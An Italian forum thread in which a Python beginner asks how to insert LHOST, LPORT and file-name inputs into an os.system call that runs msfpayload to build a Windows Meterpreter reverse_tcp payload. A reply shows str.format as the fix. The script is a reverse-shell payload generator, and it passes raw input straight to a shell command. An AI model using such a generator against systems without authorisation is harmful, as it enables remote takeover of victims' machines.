Forum >> Programmazione Python >> Scripting >> Problema os.system aggiugnere altro al comando

Pagina: 1

Buongiorno sono un nuovo utente, sto studiando python da circa una settimana e ho già creato dei piccoli programmini tipo pingtest e pulizia della cache su linux

Spiego il mio problema, utilizzo una distro linux basata sul penetration testing (Parrot Security OS 3.7)

Ho deciso di "convertire" passtemi il termine, un mio vecchio script in bash al python, giusto per esercitarmi.. ma..
il problema lo segno nel codice con " *** "

def Windows():
	# Chiedo i parametri per la creazione del payload
	print
	lhost = raw_input("LHOST: ")
	lport = raw_input("LPORT: ")
	exe = raw_input("PAYLOAD NAME: ")
	# lancio il comando con i parametri richiesti
	os.system("msfpayload -p windows/meterpreter/reverse_tcp" + ***lhost,lport,exe)
Ecco.. di fatto non capisco come aggiungere quei valori al comando..
Come posso rimediare e vorrei capire come fare ad aggiungere quei valori.

:)


Buongiorno sono un nuovo utente, sto studiando python da circa una settimana e ho già creato dei piccoli programmini tipo pingtest e pulizia della cache su linux

Spiego il mio problema, utilizzo una distro linux basata sul penetration testing (Parrot Security OS 3.7)

Ho deciso di "convertire" passtemi il termine, un mio vecchio script in bash al python, giusto per esercitarmi.. ma..
il problema lo segno nel codice con " *** "

def Windows():
	# Chiedo i parametri per la creazione del payload
	print
	lhost = raw_input("LHOST: ")
	lport = raw_input("LPORT: ")
	exe = raw_input("PAYLOAD NAME: ")
	# lancio il comando con i parametri richiesti
	os.system("msfpayload -p windows/meterpreter/reverse_tcp" + ***lhost,lport,exe)
Ecco.. di fatto non capisco come aggiungere quei valori al comando..
Come posso rimediare e vorrei capire come fare ad aggiungere quei valori.

:)
Ciao caro, forse ti basta un semplice (adattalo alla sintassi corretta):
os.system("msfpayload -p windows/meterpreter/reverse_tcp***{},{},{}".format(lhost,lport,exe))
Fammi sapere se funziona.

Cya
Ottimo, Funziona!

Quindi era solo un problema di sintassi..
quindi le graffe rappresentano che in quel punto del comando va scritto quello che l'utente ha chiesto, giusto?
quindi le graffe rappresentano che in quel punto del comando va scritto quello che l'utente ha chiesto, giusto?
Dai un'occhiata a questo.

Cya


Pagina: 1



Esegui il login per scrivere una risposta.